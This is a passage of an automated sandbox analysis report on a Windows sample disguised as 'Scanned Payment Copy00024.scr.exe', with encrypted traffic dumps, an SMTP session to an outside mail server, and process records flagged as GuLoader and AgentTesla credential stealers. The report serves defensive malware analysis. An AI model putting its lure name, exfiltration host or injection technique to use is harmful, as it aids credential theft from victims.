c7 d2 ca 14 84 e0 2d 8e 97 60 4e 5b 9f 52 10 ff 99 b5 09 99 e1 83 2a 28 3f 37 4b 2f ed ba 47 69 06 bc 7b c0 ac 13 15 41 32 72 91 af 51 f7 1e e4 cb 2f ee a1 b8 6b ce
                                                  Data Ascii: Mu.c;8^k'GI9 6\(mteTv1Ctm`k9^yx?>^M_LcYIJi f6Qjqn.4|Hgbw4i/jTY*|f8~).^-`N[R*(?7K/Gi{A2rQ/k
                                                  2021-11-29 14:53:52 UTC218INData Raw: 42 6d 2a f4 6d 13 b8 b7 24 a0 84 7e 42 6f 66 4e a6 98 e6 d8 6e fe 8b 4b f4 f8 6b f9 79 b7 59 9d ef 9c 09 d1 16 b5 00 c6 1f a3 51 db f0 85 3f ac 8a 0d 3a 00 72 26 87 cb 26 b4 3d 4a 3a f6 c3 b4 6b be 2a 68 83 36 55 e8 1d 76 1f 02 b8 cc 62 f2 a3 95 9f 0b ce f3 ce 78 53 3f 04 ba e7 eb 46 92 00 e4 eb 77 29 c2 42 85 79 13 62 68 b9 a0 09 0c 66 b0 1f a3 50 3b ef 15 ba 32 07 42 e8 0a 4c b5 ac 5f ed 5c 17 e3 34 c6 ad 4a a3 08 ba 9e e2 0c 27 a3 c4 75 bd 04 09 17 56 db 46 ab 1b e4 05 86 dc 57 d4 d7 3f ee dc a9 e7 35 01 a6 36 a1 dd 31 63 30 4a 58 37 41 b9 7e 68 48 c1 c3 eb 7b f2 e9 79 5a 95 7d fb b1 5c 7c 36 88 fa f8 c0 1b bb b5 d9 b6 98 1d ad 3c 73 3b 67 bc 02 09 80 8c 6a 01 0d 34 92 04 19 86 ea c1 0c 59 ef 9a bc bd 70 18 9c 9d 8b 12 25 50 c8 15 70 28 ac 5f 86 e5 61
                                                  Data Ascii: Bm*m$~BofNnKkyYQ?:r&&=J:k*h6UvbxS?Fw)BybhfP;2BL_\4J'uVFW?561c0JX7A~hH{yZ}\|6<s;gj4Yp%Pp(_a
                                                  2021-11-29 14:53:52 UTC219INData Raw: 46 39 15 0f c8 ab 6a 85 2a eb 72 0b e4 ca 8f e2 bc bc 6d d8 8f 97 26 aa 77 f8 32 f0 8c 77 72 f0 86 db bd 1c 31 9d 7f 8f e9 4c 19 3a f2 92 6b 14 52 0d 37 ee f4 4d 0b 6d 6b fe 81 bf 20 e7 e3 af 72 3f 16 59 1a 66 be ec 5d 49 27 d0 27 37 20 8d eb eb a7 09 0d 88 98 3b 7e 43 5d b0 b4 11 c5 e7 68 7e d2 a6 c1 20 f7 24 c6 40 e2 fc 8f a9 c0 28 7a b0 f0 27 07 ac 4c db e7 99 fe 24 89 13 64 df c4 9f 52 82 5f 17 3a 73 9d cb 1e 41 d5 91 df 0b 87 e1 1e 45 e9 59 8f 5f 81 ab 2d cb 74 d7 1b aa da 2f b5 8e 8c 20 83 59 e5 ed 27 51 96 b1 52 40 2f a2 b8 d9 b7 f1 24 5b 1d 9c 8b c0 d6 d0 2f 81 5d 53 d4 87 a7 7f ca 2f 21 3c 6f 92 2a d7 3e 73 f3 5f 99 48 b5 d6 1a 5e d0 75 ac d9 77 dc f7 ed 03 f2 bd d0 e3 07 1d 76 c2 52 95 27 c6 cd a0 ca ea 03 27 d1 0d 00 ca fc 53 27 c6 e7 24 a7 43
                                                  Data Ascii: F9j*rm&w2wr1L:kR7Mmk r?Yf]I''7 ;~C]h~ $@(z'L$dR_:sAEY_-t/ Y'QR@/$[/]S/!<o*>s_H^uwvR''S'$C
                                                  2021-11-29 14:53:52 UTC220INData Raw: 8b 3f 6c 7a 38 9f 9c 99 92 f0 41 4b cc 72 2d ac 5d 8c ef 6b ad 2d d1 7c ae cc 98 ca 06 8d 0d 7e 7b 5f 5e 3b 86 f1 73 89 eb 34 d2 0c c1 d7 f5 4b 92 8f 98 71 92 c2 2e ab 87 63 39 38 d1 06 5e cc 6b a3 fd b4 37 b8 d5 43 8c ac bd 49 3d f8 ce 8a 86 ce 88 fd 00 20 e4 b2 c6 fb a5 fe c1 5b d9 2e be b5 6b 15 65 e5 53 9d 52 6b dd 23 77 1b 12 35 17 03 c4 e1 05 3d a3 fb 16 18 44 9a 13 ab be 7c 71 7d a3 63 e7 f8 31 59 db e0 73 70 e2 9a cd 3e 7e 2c dc 59 93 7e 54 04 9a d0 49 a1 61 84 51 de 5c 4d db a9 f3 8f 82 62 b6 ae 3c c2 15 b9 f1 77 35 d0 62 d3 88 0b 75 c5 8a 6f 25 30 d1 05 9e fc 41 66 60 a4 ba 9c 4d a4 1d 3d 92 ab 36 78 7d 19 3e 0c fe 19 4a eb b8 55 12 fa 48 20 21 32 03 2b 74 77 57 b9 75 db 2b d8 83 d9 e6 86 2b 10 5c 05 5a c3 95 47 7e 5e 14 85 eb 91 08 94 61 c5 48
                                                  Data Ascii: ?lz8AKr-]k-|~{_^;s4Kq.c98^k7CI= [.keSRk#w5=D|q}c1Ysp>~,Y~TIaQ\Mb<w5buo%0Af`M=6x}>JUH !2+twWu++\ZG~^aH
                                                  2021-11-29 14:53:52 UTC221INData Raw: 4b bb 27 e5 a4 9b 60 45 e3 e0 f8 b9 91 22 1f ec 8e 50 ed 30 c0 d8 8f eb b6 84 10 37 96 78 b4 9e 03 b0 14 2f 2b 11 ed 4f c7 8c 65 89 5d 36 7e b4 3b 9f 95 16 00 5c 43 b0 ee 1b 3b c0 f9 12 59 18 2e 2c 33 02 68 05 94 19 d0 38 23 0e 84 a9 00 3d b5 38 fb ec 2a 23 2e 6a e2 45 db b2 07 32 32 d2 f6 a0 af 74 c4 5c be 9f 89 25 33 5b a1 a0 81 bd d6 1f 95 70 1c 7f 7c 41 1e 7d 78 4f 87 98 07 d3 fd c0 70 5d 22 0a b4 e9 e8 4e 8f 0e ec f6 79 20 e2 46 84 68 93 8a 66 b7 ae 01 0b 60 b9 16 ab 5a 33 e7 3d bd 20 0f 57 fa 8b d5 b4 be df 01 49 05 62 ad c7 bf ca 4f 0f b0 97 f0 8d 52 a1 c3 72 b7 0d 00 10 5f ca c7 92 12 f6 85 6a da 57 d6 d0 22 eb d4 a3 c7 35 14 b4 b7 38 dc 23 e3 dc 46 5f 30 43 b7 7c 74 55 dd de f7 66 f0 ee 79 58 94 73 ea 30 65 7b 16 8a f8 ea 40 f7 b5 bc f9 b4 9a 0f
                                                  Data Ascii: K'`E"P07x/+Oe]6~;\C;Y.,3h8#=8*#.jE22t\%3[p|A}xOp]"Ny Fhf`Z3= WIbORr_jW"58#F_0C|tUfyXs0e{@


                                                  SMTP Packets

                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                  Nov 29, 2021 15:55:27.614018917 CET58749817116.202.203.61192.168.11.20220-server.infomedya.net ESMTP Exim 4.94.2 #2 Mon, 29 Nov 2021 17:55:27 +0300
                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                  220 and/or bulk e-mail.
                                                  Nov 29, 2021 15:55:27.614382982 CET49817587192.168.11.20116.202.203.61EHLO 818225
                                                  Nov 29, 2021 15:55:27.627397060 CET58749817116.202.203.61192.168.11.20250-server.infomedya.net Hello 818225 [102.129.143.99]
                                                  250-SIZE 52428800
                                                  250-8BITMIME
                                                  250-PIPELINING
                                                  250-PIPE_CONNECT
                                                  250-STARTTLS
                                                  250 HELP
                                                  Nov 29, 2021 15:55:27.627700090 CET49817587192.168.11.20116.202.203.61STARTTLS
                                                  Nov 29, 2021 15:55:27.644790888 CET58749817116.202.203.61192.168.11.20220 TLS go ahead

                                                  Code Manipulations

                                                  Statistics

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Start time:15:53:19
                                                  Start date:29/11/2021
                                                  Path:C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe"
                                                  Imagebase:0x400000
                                                  File size:155648 bytes
                                                  MD5 hash:9EBAAB853C410A3C6EF16ECF45739E8B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Visual Basic
                                                  Reputation:low

                                                  General

                                                  Start time:15:53:19
                                                  Start date:29/11/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7454c0000
                                                  File size:875008 bytes
                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate

                                                  General

                                                  Start time:15:53:34
                                                  Start date:29/11/2021
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe"
                                                  Imagebase:0x90000
                                                  File size:108664 bytes
                                                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate

                                                  General

                                                  Start time:15:53:35
                                                  Start date:29/11/2021
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe"
                                                  Imagebase:0x230000
                                                  File size:108664 bytes
                                                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate

                                                  General

                                                  Start time:15:53:35
                                                  Start date:29/11/2021
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe"
                                                  Imagebase:0xa60000
                                                  File size:108664 bytes
                                                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000000.44493194249.0000000000F00000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.49393551309.000000001DF21000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.49393551309.000000001DF21000.00000004.00000001.sdmp, Author: Joe Security
                                                  Reputation:moderate

                                                  General

                                                  Start time:15:53:36
                                                  Start date:29/11/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7454c0000
                                                  File size:875008 bytes
                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate

                                                  Disassembly

                                                  Code Analysis

                                                  Reset < >